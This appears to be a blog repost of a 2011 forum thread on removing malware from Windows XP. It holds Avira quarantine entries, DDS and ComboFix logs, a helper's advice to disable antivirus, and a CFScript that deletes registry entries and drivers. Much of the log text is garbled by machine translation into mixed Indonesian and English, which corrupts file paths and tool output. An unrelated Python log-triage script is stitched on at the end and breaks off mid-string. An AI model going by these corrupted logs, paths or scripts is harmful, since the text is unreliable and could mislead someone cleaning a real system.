Animasi n Sahring


Thursday, 29 March 2012

Trojan / HTML Script Virus (Windows XP)

Over the last week, Avira has warned me several times about a Trojan, but neither a full Avira system scan nor an MBAM scan has found anything.

I have posted the DDS log, and attached both attach.txt and ark.txt as a .zip file.

Thank you for taking the time to look.



Here are the items in my Avira quarantine:
  • Berisi pengenalan pola dari appl / WinLock.A aplikasi C: \ Documents and Settings \ Steve \ Application Data \ dwlGina3.dll
  • Berisi pengenalan pola dari appl / WinLock.A aplikasi C: \ Documents and Settings \ Steve \ Local Settings \ Application Data \ dwlGina3.dll
  • Berisi pengenalan pola dari appl / WinLock.A aplikasi C: \ Documents and Settings \ Steve \ Local Settings \ Application Data \ dwlGina3.dll
  • Berisi pengenalan pola dari appl / WinLock.A aplikasi C: \ Documents and Settings \ Dan \ Application Data \ dwlGina3.dll
  • Berisi pengenalan pola virus HTML / Malicious.PDF.Gen script HTML C: \ Documents and Settings \ Steve \ Local Settings \ Temp \ Acr3B.tmp
  • Apakah TR / Trash.Gen Trojan C: \ System Volume Information \ _restore {1E827FEA-C1CA-4779-8180-5FD4C976D44A} \ RP281 \ A0068379.exe
  • Apakah TR / Trash.Gen Trojan C: \ System Volume Information \ _restore {1E827FEA-C1CA-4779-8180-5FD4C976D44A} \ RP281 \ A0068380.exe
  • Apakah TR / Trash.Gen Trojan C: \ System Volume Information \ _restore {1E827FEA-C1CA-4779-8180-5FD4C976D44A} \ RP281 \ A0068381.exe
  • Apakah TR / Trash.Gen Trojan C: \ System Volume Information \ _restore {1E827FEA-C1CA-4779-8180-5FD4C976D44A} \ RP281 \ A0068382.exe
  • Apakah TR / Trash.Gen Trojan C: \ System Volume Information \ _restore {1E827FEA-C1CA-4779-8180-5FD4C976D44A} \ RP281 \ A0068383.exe
  • Apakah TR / Trash.Gen Trojan C: \ System Volume Information \ _restore {1E827FEA-C1CA-4779-8180-5FD4C976D44A} \ RP281 \ A0068384.exe
  • Apakah TR / Trash.Gen Trojan C: \ System Volume Information \ _restore {1E827FEA-C1CA-4779-8180-5FD4C976D44A} \ RP281 \ A0068385.exe
  • Apakah TR / Trash.Gen Trojan C: \ System Volume Information \ _restore {1E827FEA-C1CA-4779-8180-5FD4C976D44A} \ RP281 \ A0068386.exe
  • Berisi pengenalan pola EXP / Pidief.akx mengeksploitasi C: \ Documents and Settings \ Steve \ Local Settings \ Temp \ plugtmp-1 \ 1ddfp.php plugin-


Here is my DDS log:
.
DDS (Ver_2011-08-26,01) - NTFSx86
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 1.6.0_29
Jalankan oleh Dan di 16:00:28 pada 2011/11/09
Microsoft Windows XP Home Edition 5.1.2600.3.1252.44.1033.18.447.182 [GMT 0:00]
.
AV: AntiVir Desktop * Diaktifkan / Diperbarui * {AD166499-45F9-482A-A743-FDD3350758C7}
.
============== Menjalankan Proses ===============
.
C: \ WINDOWS \ system32 \ Ati2evxx.exe
C: \ WINDOWS \ system32 \ svchost-k DcomLaunch
svchost.exe
C: \ WINDOWS \ System32 \ svchost.exe-k netsvcs
svchost.exe
svchost.exe
C: \ WINDOWS \ system32 \ spoolsv.exe
C: \ Program Files \ Avira \ AntiVir Desktop \ sched.exe
svchost.exe
C: \ Program Files \ Avira \ AntiVir Desktop \ avguard.exe
C: \ Program Files \ Common Files \ Apple \ Dukungan Mobile Device \ AppleMobileDeviceService.exe
C: \ Program Files \ Bonjour \ EXE
c: \ APPS \ PowerCinema \ Kernel \ TV \ CLCapSvc.exe
c: \ APPS \ PowerCinema \ Kernel \ CLML_NTService \ CLMLServer.exe
C: \ Program Files \ Avira \ AntiVir Desktop \ avshadow.exe
C: \ Program Files \ Java \ jre6 \ bin \ jqs.exe
C: \ WINDOWS \ system32 \ svchost.exe-k imgsvc
C: \ Program Files \ Sonic \ DigitalMedia LE v7 \ MyDVD LE \ USBDeviceService.exe
c: \ APPS \ PowerCinema \ Kernel \ TV \ CLSched.exe
C: \ WINDOWS \ System32 \ svchost.exe-k HTTPFilter
C: \ WINDOWS \ system32 \ Ati2evxx.exe
C: \ WINDOWS \ Explorer.exe
C: \ WINDOWS \ SOUNDMAN.EXE
C: \ APPS \ PowerCinema \ PCMService.exe
C: \ Program Files \ Sonic \ DigitalMedia LE v7 \ MyDVD LE \ DetectorApp.exe
C: \ Program Files \ Common Files \ InstallShield \ updateservice \ issch.exe
C: \ WINDOWS \ system32 \ wuauclt.exe
C: \ PROGRA ~ 1 \ GOTOSO ~ 1 \ VADERE ~ 1 \ Vaderetro_oe.exe
C: \ Program Files \ Avira \ AntiVir Desktop \ avgnt.exe
C: \ Program Files \ Common Files \ Java \ Java Pembaruan \ jusched.exe
C: \ WINDOWS \ system32 \ ctfmon.exe
C: \ WINDOWS \ system32 \ notepad.exe
C: \ Documents and Settings \ Dan \ Desktop \ dds.scr
.
============== Pseudo HJT Laporan ===============
.
uStart Halaman = sekitar : Kosong
mDefault_Page_URL = hxxp :/ / www.yahoo.com/?ilc=8
mStart Halaman = hxxp :/ / www.yahoo.com/?ilc=8
Pengaturan uInternet, ProxyOverride = *. lokal
BHO: {02478D38-C3F9-4efb-9B51-7695ECA05670} - Tidak Ada File
BHO: Kelas AcroIEHlprObj: {06849e9f-c8d7-4d59-b87d-784b7d6be0b3} - c: \ program files \ adobe \ acrobat 7.0 \ ActiveX \ AcroIEHelper.dll
BHO: {5C255C8A-E604-49b4-9D64-90988571CECB} - Tidak Ada File
BHO: Windows Live Sign-in Helper: {9030d464-4c02-4abf-8ecc-5164760863c6} - c: \ program files \ file umum \ microsoft shared \ windows live \ WindowsLiveLogin.dll
BHO: Java (tm) Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c: \ program files \ java \ jre6 \ bin \ jp2ssv.dll
BHO: JQSIEStartDetectorImpl Kelas: {e7e6f031-17ce-4c07-bc86-eabfe594f69c} - c: \ program files \ java \ jre6 \ lib \ menyebarkan \ jqs \ yaitu \ jqs_plugin.dll
BHO: {FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} - Tidak Ada File
TB: {EF99BD32-C1FB-11D2-892F-0090271D4F88} - Tidak Ada File
TB: {0B53EAC3-8D69-4B9E-9B19-A37C9A5676A7} - Tidak Ada File
EB: Real.com: {fe54fa40-d68c-11d2-98fa-00c0f0318afe} - c: \ windows \ system32 \ shdocvw.dll
uRun: [CCleaner] "c: \ program files \ CCleaner \ CCleaner.exe" / AUTO
uRun: [ctfmon.exe] c: \ windows \ system32 \ ctfmon.exe
mRun: [soundman] SOUNDMAN.EXE
mRun: [PCMService] "c: \ aplikasi \ PowerCinema \ PCMService.exe"
mRun: [DetectorApp] c: \ program files \ sonik \ digitalmedia le v7 \ mydvd le \ DetectorApp.exe
mRun: [ISUSPM Startup] c: \ progra ~ 1 \ umum ~ 1 \ instal ~ 1 \ pembaruan ~ 1 \ ISUSPM.exe-startup
mRun: [ISUSScheduler] "c: \ program files \ file umum \ InstallShield \ updateservice \ issch.exe"-start
mRun: [Vade Retro Outlook Express] "c: \ progra ~ 1 \ gotoso ~ 1 \ vadere ~ 1 \ Vaderetro_oe.exe"
mRun: [avgnt] "c: \ program files \ avira \ AntiVir Desktop \ avgnt.exe" / menit
mRun: [SunJavaUpdateSched] "c: \ program files \ file umum \ java \ java update \ jusched.exe"
dRun: [ctfmon.exe] c: \ windows \ system32 \ ctfmon.exe
IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} -% windir% \ Jaringan Diagnostik \ xpnetdiag.exe
IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c: \ program files \ utusan \ msmsgs.exe
IE: {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - {FE54FA40-D68C-11d2-98FA-00C0F0318AFE} - c: \ windows \ system32 \ shdocvw.dll
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp :/ / java.sun.com/update/1.6.0/jinstall-1_6_0_29-windows-i586.cab
DPF: {CAFEEFAC-0015-0000-0004-ABCDEFFEDCBA} - hxxp :/ / java.sun.com/update/1.5.0/jinstall-1_5_0_04-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0029-ABCDEFFEDCBA} - hxxp :/ / java.sun.com/update/1.6.0/jinstall-1_6_0_29-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp :/ / java.sun.com/update/1.6.0/jinstall-1_6_0_29-windows-i586.cab
TCP: DhcpNameServer = 192.168.0.1
TCP: Antarmuka \ {F9F330CE-AFF2-4E0E-9E59-E25077BFCC77}: DhcpNameServer = 192.168.0.1
Beritahu: AtiExtEvent - Ati2evxx.dll
SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c: \ windows \ system32 \ WPDShServiceObj.dll
Host: 127.0.0.1 www.spywareinfo.com
.
================= FIREFOX ===================
.
FF - ProfilePath - c: \ Documents and Settings \ Dan \ aplikasi data \ mozilla \ firefox \ profiles \ 2cqiyjwl.default \
.
============= LAYANAN / DRIVER ===============
.
R1 avgio; avgio c: \ program files \ avira \ AntiVir Desktop \ avgio.sys [2010/11/03 11608]
R2 AntiVirSchedulerService; Avira AntiVir Penjadwal c: \ program files \ avira \ AntiVir Desktop \ sched.exe [2010/11/03 136.360]
R2 AntiVirService; Avira AntiVir Garda c: \ program files \ avira \ AntiVir Desktop \ avguard.exe [2010/11/03 269.480]
R2 avgntflt; avgntflt c: \ windows \ system32 \ drivers \ avgntflt.sys [2010/11/03 66616]
Clr_optimization_v4.0.30319_32 S2, Microsoft NET Framework NGEN v4.0.30319_X86 c:. \ Windows \ microsoft.net \ kerangka \ v4.0.30319 \ mscorsvw.exe [2010/03/18 130.384]
S3 Lavasoft Kernexplorer; Lavasoft pembantu pengemudi; \ \ c:? -: [?] \ Program files \ Lavasoft \ ad-aware \ kernexplorer.sys> c \ program files \ Lavasoft \ ad-aware \ KernExplorer.sys
S3 WinRM; Windows Remote Management (WS-Management); c: \ windows \ system32 \ svchost.exe-k WinRM [2006/09/05 14336]
S3 WPFFontCache_v0400; Windows Presentation Foundation Font Cache 4.0.0.0 c: \ windows \ microsoft.net \ kerangka \ v4.0.30319 \ WPF \ WPFFontCache_v0400.exe [2010/03/18 753.504]
.
=============== Dibuat 30 terakhir ================
.
2011/11/09 15:17:38 -------- d - h - r-c: \ Documents and Settings \ Dan \ terbaru
2011/11/04 19:57:55 -------- d ----- w-c: \ program files \ Realtek AC97
.
==================== Find3M ====================
.
2011/10/17 11:07:35 414.368 ---- aw-c: \ windows \ system32 \ FlashPlayerCPLApp.cpl
2011-10-03 04 03 472808 ---- aw-c: \ windows \ system32 \ deployJava1.dll
2011/10/03 01:37:52 73728 ---- aw-c: \ windows \ system32 \ javacpl.cpl
2011/09/26 10:41:20 611.328 ---- aw-c: \ windows \ system32 \ uiautomationcore.dll
2011/09/26 10:41:20 220.160 ---- aw-c: \ windows \ system32 \ oleacc.dll
2011/09/26 10:41:14 20480 ---- aw-c: \ windows \ system32 \ oleaccrc.dll
2011/09/22 10:36:23 101.720 ---- aw-c: \ windows \ system32 \ drivers \ SBREDrv.sys
2011/09/09 09:12:13 599.040 ---- aw-c: \ windows \ system32 \ crypt32.dll
2011/09/06 13:20:51 1.858.944 ---- aw-c: \ windows \ system32 \ win32k.sys
2011/08/31 16:00:50 22216 ---- aw-c: \ windows \ system32 \ drivers \ mbam.sys
2011/08/22 23:48:55 916.480 ---- aw-c: \ windows \ system32 \ wininet.dll
2011/08/22 23:48:54 43.520 ------ w-c: \ windows \ system32 \ licmgr10.dll
2011/08/22 23:48:54 1.469.440 ------ w-c: \ windows \ system32 \ inetcpl.cpl
2011/08/22 11:56:39 385.024 ---- aw-c: \ windows \ system32 \ html.iec
2011/08/17 13:49:54 138.496 ---- aw-c: \ windows \ system32 \ drivers \ afd.sys
.
============= FINISH: 16:01:38.46 ===============
 
Re: Trojan / HTML Script Virus (Windows XP)
Hello HertsMan123. Let's see whether ComboFix finds anything.

------------------------------------------------------

Please stay with me until you are given the 'all clear', even if the symptoms seem to abate.

Please follow my instructions, and please do not attempt any fixes yourself or run any scanners unless asked to by a helper.

------------------------------------------------------

If there are any personal files, pics, etc. on your computer that you cannot live without, back them up now, just as a precaution.

Emergency Backup Procedure - Tech Support Forum

------------------------------------------------------

Please visit this web page for the download link and instructions for running ComboFix:

A guide and tutorial on using ComboFix

* Make sure you have disabled all antivirus and antimalware programs so they do not interfere with the running of ComboFix.

Getting help here

Please post C:\ComboFix.txt in your next reply for further review.

Please re-enable your antivirus before posting the ComboFix.txt log.


Re: Trojan / HTML Script Virus (Windows XP)
ComboFix log below. I opened Avira to disable the antivirus, and it said Disabled, but when I ran ComboFix a message appeared saying the antivirus was still running, but that the scan would continue.
After ComboFix had run its scan, an Internet Explorer shortcut appeared on my desktop.
The lag is still happening.

Thanks :)


ComboFix 11-11-14.02 - Dan 14/11/2011 18:12:38.1.1 - x86
Microsoft Windows XP Home Edition 5.1.2600.3.1252.44.1033.18.447.247 [GMT 0:00]
Menjalankan dari: c: \ Documents and Settings \ Dana \ Desktop \ ComboFix.exe
AV: AntiVir Desktop * Diaktifkan / Diperbarui * {AD166499-45F9-482A-A743-FDD3350758C7}
.
.
(((((((((((((((((((((((((((((((((((((((Penghapusan lain))))))))) ))))))))))))))))))))))))))))))))))))))))
.
.
c: \ Documents and Settings \ Administrator \ WINDOWS
c: \ Documents and Settings \ All Users \ Application Data \ Tarma Installer
c: \ Documents and Settings \ All Users \ Application Data \ Tarma Installer \ {D6B25B8D-0566-42B1-A23D-7576138435D6} \ _Setup.dll
c: \ Documents and Settings \ All Users \ Application Data \ Tarma Installer \ {D6B25B8D-0566-42B1-A23D-7576138435D6} \ Setup.dat
c: \ Documents and Settings \ All Users \ Application Data \ Tarma Installer \ {D6B25B8D-0566-42B1-A23D-7576138435D6} \ Setup.exe
c: \ Documents and Settings \ All Users \ Application Data \ Tarma Installer \ {D6B25B8D-0566-42B1-A23D-7576138435D6} \ Setup.ico
c: \ Documents and Settings \ Dan \ WINDOWS
c: \ Documents and Settings \ Default User \ WINDOWS
c: \ Documents and Settings \ Steve \ Local Settings \ Application Data \ uk6.exe
c: \ Documents and Settings \ Steve \ Local Settings \ Application Data \ uk66.exe
c: \ Documents and Settings \ Steve \ WINDOWS
C: \ install.exe
c: \ windows \ system32 \ config \ systemprofile \ WINDOWS
.
.
(((((((((((((((((((((((((File Dibuat dari 2011/10/14 ke 2011-11-14))))))))))) ))))))))))))))))))))
.
.
2011/11/14 16:24. 2011/11/14 18:30 -------- d ----- w-c: \ Documents and Settings \ Administrator
2011/11/04 19:57. 2011/11/04 19:58 -------- d ----- w-c: \ program files \ Realtek AC97
2011/11/04 16:17. 2011/11/04 16:17 -------- d ----- w-c: \ Documents and Settings \ New Folder
.
.
.
((((((((((((((((((((((((((((((((((((((((Find3M Laporan)))))))) ))))))))))))))))))))))))))))))))))))))))))))
.
2011/11/13 09:10. 2011/08/28 16:11 414.368 ---- aw-c: \ windows \ system32 \ FlashPlayerCPLApp.cpl
2011/10/10 14:22. 2006/08/27 19:30 692.736 ---- aw-c: \ windows \ system32 \ inetcomm.dll
2011/10/03 04:06. 2010-11-02 22:19 472.808 ---- aw-c: \ windows \ system32 \ deployJava1.dll
2011/10/03 01:37. 2011/07/01 19:00 73728 ---- aw-c: \ windows \ system32 \ javacpl.cpl
2011/09/28 07:06. 2006/09/05 14:50 599.040 ---- aw-c: \ windows \ system32 \ crypt32.dll
2011/09/26 10:41. 2008-07-29 19:59 611.328 ---- aw-c: \ windows \ system32 \ uiautomationcore.dll
2011/09/26 10:41. 2006/09/05 14:56 220.160 ---- aw-c: \ windows \ system32 \ oleacc.dll
2011/09/26 10:41. 2006/09/05 14:56 20.480 ---- aw-c: \ windows \ system32 \ oleaccrc.dll
2011/09/22 10:36. 2011/03/17 09:50 101.720 ---- aw-c: \ windows \ system32 \ drivers \ SBREDrv.sys
2011/09/06 13:20. 2006-08-28 3:19 1.858.944 ---- aw-c: \ windows \ system32 \ win32k.sys
2011/08/31 16:00. 2010-11-03 21:33 22216 ---- aw-c: \ windows \ system32 \ drivers \ mbam.sys
2011/08/22 23:48. 2006-08-28 03:19 916.480 ---- aw-c: \ windows \ system32 \ wininet.dll
2011/08/22 23:48. 2006/09/05 14:54 43.520 ------ w-c: \ windows \ system32 \ licmgr10.dll
2011/08/22 23:48. 2006/09/05 14:52 1.469.440 ------ w-c: \ windows \ system32 \ inetcpl.cpl
2011/08/22 11:56. 2006/09/05 14:52 385.024 ---- aw-c: \ windows \ system32 \ html.iec
2011/08/17 13:49. 2006/09/05 14:49 138.496 ---- aw-c: \ windows \ system32 \ drivers \ afd.sys
.
.
(((((((((((((((((((((((((((((((((((((Reg Poin Memuat)))))))))) ))))))))))))))))))))))))))))))))))))))))
.
.
* Catatan * entri kosong & entri standar legit tidak ditampilkan
REGEDIT4
.
[HKEY_CURRENT_USER \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run]
"CCleaner" = "c: \ program files \ CCleaner \ CCleaner.exe" [2011/07/25 2585408]
.
[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run]
"Penata suara" = "SOUNDMAN.EXE" [2007/04/16 577.536]
"PCMService" = "c: \ aplikasi \ PowerCinema \ PCMService.exe" [2006/02/23 147.456]
"DetectorApp" = "c: \ program files \ Sonic \ DigitalMedia LE v7 \ MyDVD LE \ DetectorApp.exe" [2005/10/20 102400]
"ISUSPM Startup" = "c: \ progra ~ 1 \ UMUM ~ 1 \ instal ~ 1 \ UPDATE ~ 1 \ ISUSPM.exe" [2004-07-27 221.184]
"ISUSScheduler" = "c: \ program files \ Common Files \ InstallShield \ updateservice \ issch.exe" [2004-07-27 81920]
"Vade Retro Outlook Express" = "c: \ progra ~ 1 \ GOTOSO ~ 1 \ VADERE ~ 1 \ Vaderetro_oe.exe" [2004/10/04 310.272]
"Avgnt" = "c: \ program files \ Avira \ AntiVir Desktop \ avgnt.exe" [2010-08-02 281.768]
"SunJavaUpdateSched" = "c: \ program files \ Common Files \ Java \ Java Pembaruan \ jusched.exe" [2011/06/09 254.696]
.
[HKEY_USERS \ DEFAULT \ Software \ Microsoft. \ Windows \ CurrentVersion \ Run]
"Ctfmon.exe" = "c: \ windows \ system32 \ ctfmon.exe" [2008/04/14 15360]
.
[HKLM \ ~ \ startupfolder \ C: Documents and Settings ^ ^ ^ Semua Pengguna Start Menu ^ ^ Program Startup ^ Adobe Reader Kecepatan Launch.lnk]
path = c: \ Documents and Settings \ All Users \ Start Menu \ Programs \ Startup \ Adobe Reader Kecepatan Launch.lnk
cadangan = c: \ windows \ PSS \ Adobe Reader Kecepatan Launch.lnkCommon Startup
.
[HKLM \ ~ \ startupfolder \ C: Documents and Settings ^ ^ ^ Dan Start Menu ^ ^ Program Startup ^ EvernoteClipper.lnk]
path = c: \ Documents and Settings \ Dan \ Start Menu \ Programs \ Startup \ EvernoteClipper.lnk
cadangan = c: \ windows \ PSS \ EvernoteClipper.lnkStartup
.
[HKEY_LOCAL_MACHINE \ software \ microsoft \ shared tools \ msconfig \ startupreg \ Messenger (Yahoo!)]
2009-05-26 20:06 4.351.216 ---- aw-c: \ program files \ Yahoo! \ Messenger \ yahoomessenger.exe
.
[HKEY_LOCAL_MACHINE \ software \ microsoft \ shared tools \ msconfig \ startupreg \ QuickTime Task]
2010-11-29 17:38 421.888 ---- aw-c: \ program files \ QuickTime \ QTTask.exe
.
[HKEY_LOCAL_MACHINE \ software \ microsoft \ shared tools \ msconfig \ startupreg \ RealTray]
2006/08/27 20:28 26112-c - aw-c: \ program files \ Estat \ RealPlayer \ realplay.exe
.
[HKEY_LOCAL_MACHINE \ software \ microsoft \ shared tools \ msconfig \ startupreg \ Recguard]
2002/09/13 20:42 212992-c - aw-c: \ windows \ SMINST \ Recguard.exe
.
[HKEY_LOCAL_MACHINE \ software \ microsoft \ shared tools \ msconfig \ startupreg \ RIMBBLaunchAgent.exe]
2011-02-18 10:47 79192-c - aw-c: \ program files \ Common Files \ Research In Motion \ USB Driver \ RIMBBLaunchAgent.exe
.
[HKEY_LOCAL_MACHINE \ software \ microsoft \ shared tools \ msconfig \ startupreg \ Yahoo! Pager]
2009-05-26 20:06 4.351.216 ---- aw-c: \ program files \ Yahoo! \ Messenger \ yahoomessenger.exe
.
[HKLM \ ~ \ jasa \ sharedaccess \ parameters \ firewallpolicy \ standardprofile \ AuthorizedApplications \ Daftar]
"% Windir% \ \ system32 \ \ sessmgr.exe" =
"C: \ \ APPS \ \ PowerCinema \ \ PowerCinema.exe" =
"C: \ \ APPS \ \ PowerCinema \ \ PCMService.exe" =
"C: \ \ Program Files \ \ Yahoo! \ \ Messenger \ \ yahoomessenger.exe" =
"C: \ \ Program Files \ \ Messenger \ \ msmsgs.exe" =
"% Windir% \ \ Jaringan Diagnostik \ \ xpnetdiag.exe" =
"C: \ \ Program Files \ \ Windows Live \ \ Messenger \ \ wlcsdk.exe" =
"C: \ \ Program Files \ \ Windows Live \ \ Messenger \ \ msnmsgr.exe" =
"C: \ \ Program Files \ \ Bonjour \ \ EXE" =
"C: \ \ Program Files \ \ Mozilla Firefox \ \ firefox.exe" =
"C: \ \ Program Files \ \ Research In Motion \ \ BlackBerry Desktop \ \ Rim.Desktop.exe" =
.
[HKLM \ ~ \ jasa \ sharedaccess \ parameters \ firewallpolicy \ standardprofile \ GloballyOpenPorts \ Daftar]
"5985: TCP" = 5985: TCP: *: diaktifkan: Windows Remote Management
.
R2 AntiVirSchedulerService; Avira AntiVir Penjadwal c: \ program files \ Avira \ AntiVir Desktop \ sched.exe [2011/04/27 136.360]
R2 clr_optimization_v4.0.30319_32; Microsoft NET Framework NGEN v4.0.30319_X86 c:. \ Windows \ Microsoft.NET \ Framework \ v4.0.30319 \ mscorsvw.exe [2010-03-18 130.384]
R3 Lavasoft Kernexplorer; Lavasoft sopir pembantu; c: \ program files \ Lavasoft \ Ad-Aware \ KernExplorer.sys [x]
R3 WPFFontCache_v0400; Windows Presentation Foundation Cache font 4.0.0.0 c: \ windows \ Microsoft.NET \ Framework \ v4.0.30319 \ WPF \ WPFFontCache_v0400.exe [2010-03-18 753.504]
.
.
[HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows NT \ CurrentVersion \ svchost]
WinRM REG_MULTI_SZ WinRM
.
Isi folder 'Scheduled Tasks'
.
2011/11/12 c: \ windows \ Tasks \ AppleSoftwareUpdate.job
- C: \ program files \ Apple Software Update \ SoftwareUpdate.exe [2009-10-22 11:50]
.
.
Pindai Tambahan ------- -------
.
uStart Halaman = sekitar : Kosong
mStart Halaman = hxxp :/ / www.yahoo.com/?ilc=8
Pengaturan uInternet, ProxyOverride = *. lokal
TCP: DhcpNameServer = 192.168.0.1
FF - ProfilePath - c: \ Documents and Settings \ Dan \ Application Data \ Mozilla \ Firefox \ Profiles \ 2cqiyjwl.default \
FF - prefs.js: browser.startup.homepage - sekitar : Kosong
FF - Ext: Default: {972ce4c6-7e08-4474-a285-3208198ce6fd} - c: \ program files \ Mozilla Firefox \ extensions \ {972ce4c6-7e08-4474-a285-3208198ce6fd}
FF - Ext: Java Console: {CAFEEFAC-0016-0000-0022-ABCDEFFEDCBA} - c: \ program files \ Mozilla Firefox \ extensions \ {CAFEEFAC-0016-0000-0022-ABCDEFFEDCBA}
FF - Ext: Java Console: {CAFEEFAC-0016-0000-0023-ABCDEFFEDCBA} - c: \ program files \ Mozilla Firefox \ extensions \ {CAFEEFAC-0016-0000-0023-ABCDEFFEDCBA}
FF - Ext: Java Console: {CAFEEFAC-0016-0000-0024-ABCDEFFEDCBA} - c: \ program files \ Mozilla Firefox \ extensions \ {CAFEEFAC-0016-0000-0024-ABCDEFFEDCBA}
FF - Ext: Java Console: {CAFEEFAC-0016-0000-0026-ABCDEFFEDCBA} - c: \ program files \ Mozilla Firefox \ extensions \ {CAFEEFAC-0016-0000-0026-ABCDEFFEDCBA}
FF - Ext: Java Console: {CAFEEFAC-0016-0000-0029-ABCDEFFEDCBA} - c: \ program files \ Mozilla Firefox \ extensions \ {CAFEEFAC-0016-0000-0029-ABCDEFFEDCBA}
FF - Ext: pdf download: {37E4D8EA-8BDA-4831-8EA1-89053939A250} -%% profil \ extensions \ {37E4D8EA-8BDA-4831-8EA1-89053939A250}
FF - Ext: Flashblock: {3d7eb24f-2740-49df-8937-200b1cc08f8a} -%% profil \ extensions \ {3d7eb24f-2740-49df-8937-200b1cc08f8a}
FF - Ext: NoScript: {73a6fe31-595d-460b-A920-fcc0f8843232} -%% profil \ extensions \ {73a6fe31-595d-460b-A920-fcc0f8843232}
FF - Ext: DownloadHelper: {b9db16a4-6edc-47ec-a1f4-b86292ed211d} -%% profil \ extensions \ {b9db16a4-6edc-47ec-a1f4-b86292ed211d}
FF - Ext: Adblock Plus: {d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d} - profil%% \ extensions \ {d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}
FF - Ext: Download Statusbar: {D4DD63FA-01E4-46a7-B6B1-EDAB7D6AD389} -%% profil \ extensions \ {D4DD63FA-01E4-46a7-B6B1-EDAB7D6AD389}
FF - Ext: Pixlr Grabber: {d47a9f51-8281-43fa-f450-f28ef8735e9a} -%% profil \ extensions \ {d47a9f51-8281-43fa-f450-f28ef8735e9a}
FF - Ext: Microsoft Kerangka Asisten NET: {20a82645-c095-46ed-80e3-08825760534b} - c:. \ Windows \ Microsoft.NET \ Framework \ v3.5 \ Windows Presentation Foundation \ DotNetAssistantExtension
FF - Ext: Jawa Cepat Starter: jqs@sun.com - c: \ program files \ Java \ jre6 \ lib \ menyebarkan \ jqs \ ff
.
ANAK YATIM ---- DIHAPUS ----
.
SafeBoot-Wdf01000.sys
MSConfigStartUp-BlackBerryAutoUpdate - c: \ program files \ Common Files \ Research In Motion \ Auto Update \ RIMAutoUpdate.exe
MSConfigStartUp-iTunesHelper - c: \ program files \ iTunes \ iTunesHelper.exe
MSConfigStartUp-MsnMsgr - c: \ program files \ MSN Messenger \ msnmsgr.exe
AddRemove-{D6B25B8D-0566-42B1-A23D-7576138435D6} - c: \ DOCUME ~ 1 \ ALLUSE ~ 1 \ applic ~ 1 \ TARMAI ~ 1 \ {D6B25 ~ 1 \ Setup.exe
.
.
.
************************************************** ************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit / siluman detektor malware dengan GMER, GMER - Rootkit Detector dan Remover
Rootkit Scan 2011/11/14 18:33
Jendela 5.1.2600 Service Pack 3 NTFS
.
scanning proses tersembunyi ...
.
pemindaian entri autostart tersembunyi ...
.
pemindaian file yang tersembunyi ...
.
memindai selesai dengan sukses
hidden file: 0
.
************************************************** ************************
.
--------------------- DLL Loaded Dalam Menjalankan Proses ---------------------
.
-------> 'Winlogon.exe' (696)
c: \ windows \ system32 \ Ati2evxx.dll
.
Penyelesaian waktu: 2011/11/14 18:44:27
ComboFix-dikarantina-files.txt 2011/11/14 18:44
.
Pra-Run: 58004619264 bytes bebas
Pasca-Run: 57957384192 bytes bebas
.
WindowsXP-KB310994-SP2-Home-bootdisk-ENU.exe
[Boot loader]
timeout = 2
default = multi (0) disk (0) rdisk (0) partisi (1) \ WINDOWS
[Sistem operasi]
c: \ cmdcons \ BOOTSECT.DAT = "Microsoft Windows Recovery Console" / cmdcons
UnsupportedDebug = "tidak memilih ini" / debug
multi (0) disk (0) rdisk (0) partisi (1) \ WINDOWS = "Microsoft Windows XP Home Edition" / noexecute = optin / fastdetect
.
- End Of File - 8E5BF5531544B503427E1838A315DE5A
__________________
 
Re: Trojan / HTML Script Virus (Windows XP)
Hello again, HertsMan123.

Disable the antivirus and antispyware applications, usually by right-clicking their System Tray icons. Otherwise they can interfere with ComboFix.

Open Notepad and copy/paste all the text in the codebox below into Notepad:

Code:
 Folder::
 c:\program files\Lavasoft

 ClearJavaCache::

 Registry::
 [HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
 "5985:TCP"=-
 [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\svchost]
 "WinRM"=-

 Driver::
 Lavasoft Kernexplorer
Save the Notepad file as CFScript.txt to the Desktop and then close the file.





Referring to the image above, drag CFScript onto ComboFix.

If you are asked to update ComboFix, please choose Yes.

Your desktop may go blank. This is normal. It will return when ComboFix is done. ComboFix may reboot your computer. This is normal.

When it has finished, it will produce a log for you. Please post that log, C:\ComboFix.txt, in your next reply.

Please re-enable your antivirus before posting the ComboFix.txt log.

------------------------------------------------------
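As an added illustration (not code from the thread, nor from the DDS or ComboFix tools), the following Python triages the kinds of log entries the CFScript above targets: a firewall GloballyOpenPorts rule for WinRM (5985/TCP), a driver whose file is missing (marked `[x]`), BHO/toolbar registrations with "No File", and hosts-file overrides. The sample log is constructed to mirror the lines quoted earlier in the thread, and the regexes assume the unmodified English DDS/ComboFix line formats.

```python
import re
from dataclasses import dataclass, field
from typing import List, Tuple

# Constructed sample (not the thread's log verbatim), modelled on the DDS/ComboFix
# lines quoted above: BHOs without a backing file, a hosts-file override, a firewall
# GloballyOpenPorts entry for WinRM (5985/TCP) and an orphaned Lavasoft driver ([x]).
SAMPLE_LOG = r"""
BHO: {02478D38-C3F9-4efb-9B51-7695ECA05670} - No File
BHO: AcroIEHlprObj Class: {06849e9f-c8d7-4d59-b87d-784b7d6be0b3} - c:\program files\adobe\acrobat 7.0\activex\AcroIEHelper.dll
TB: {EF99BD32-C1FB-11D2-892F-0090271D4F88} - No File
Hosts: 127.0.0.1 www.spywareinfo.com
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
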